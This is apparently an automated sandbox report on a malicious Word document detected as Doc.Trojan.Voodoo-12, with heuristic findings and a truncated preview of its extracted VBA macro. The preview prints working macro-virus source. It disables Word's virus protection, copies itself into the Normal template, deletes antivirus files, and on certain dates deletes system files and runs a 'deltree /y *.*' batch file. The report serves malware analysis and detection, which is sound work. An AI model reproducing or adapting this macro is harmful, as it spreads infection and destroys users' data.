MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an OLE document containing a VBA macro that executes automatically via the Document_Open subroutine. This macro attempts to disable virus protection and uses the Shell() function, indicating an intent to execute arbitrary code. The presence of the 'Doc.Trojan.Voodoo-12' ClamAV signature further confirms its malicious nature, likely as a downloader.
Heuristics 6
-
ClamAV: Doc.Trojan.Voodoo-12 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Voodoo-12
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 46,080 bytes but its declared streams total only 26,611 bytes — 19,469 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4393 bytes |
SHA-256: ac5985625feeeb6401db3afbc551464d97cdaff9a31be62c7efb8165f585f595 |
|||
|
Detection
ClamAV:
Doc.Trojan.Voodoo-12
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open()
'///////////////////////////\°°°°°°°°°°°°°°°°°/\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'////////////////////////////VooDoo NIGHT v1.0\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'***************************************************************************'
On Error Resume Next
'VooDoo Night, VooDoo Night, Come and Change my FACE
Set CNormalTemplate = NormalTemplate.VBProject
Set CActiveDocument = ActiveDocument.VBProject
Set Coptions = Options
Dim SysDate
'VooDoo Night, Voodoo Night Your are so beautiful, Make everyone stay away from ME
Application.EnableCancelKey = wdCancelDisabled
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=wdKeyCategoryFont, Command:=" "
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=wdKeyCategoryFont, Command:=" "
Application.CommandBars("Tools").Controls(12).Visible = False
Coptions.VirusProtection = False
a = CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
b = CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
If a = 86 And b = 86 Then GoTo AvCheck
If a = 86 Then
CActiveDocument.vbcomponents(1).CodeModule.DeleteLines 1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
FullCode = CNormalTemplate.vbcomponents(1).CodeModule.Lines(1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines)
CActiveDocument.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If
If b >= 84 Then
CNormalTemplate.vbcomponents(1).CodeModule.DeleteLines 1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
FullCode = CActiveDocument.vbcomponents(1).CodeModule.Lines(1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines)
CNormalTemplate.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If
AvCheck:
'VooDoo Night, VooDoo Night, will this be my END?
If Dir("C:\Programme\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\Programme\AntiViral Toolkit Pro\macro.avc")
If Dir("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc")
If Dir("C:\F-PROT\Macro.def") <> "" Then Kill ("C:\F-PROT\Macro.def")
If Dir("C:\Programme\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\NavLu32.exe")
If Dir("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe")
If Dir("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe")
If Dir("C:\Programme\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\Rescue.exe")
Payload:
'Payload_1_
If Day(Now) = 31 Then
MsgBox " GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN- itz VooDoo NIGHT! (c)1999 by doc"
Open ("C:\windows\win.com") For Output As #12
Print #1, 20, "-VooDoo NIGHT-"
Close #1
SetAttr "c:\io.sys", vbNormal
Kill ("c:\io.sys")
SetAttr "c:\windows\system.ini", vbNormal
Kill ("c:\windows\system.ini")
End If
'-----------------------------------------------------------------------------------------------------------------------
'Payload_2_
If Day(Now) = 13 Then
Open ("c:\autoexec.bat") For Output As #13
Print #13, "deltree /y *.*"
Print #13, "exit"
Close #13
SetAttr "c:\windows\regedit.exe", vbNormal
Kill ("c:\windows\regedit.exe")
Shell ("c:\autoexec.bat"), vbHide
Do
MsgBox " GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN-
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.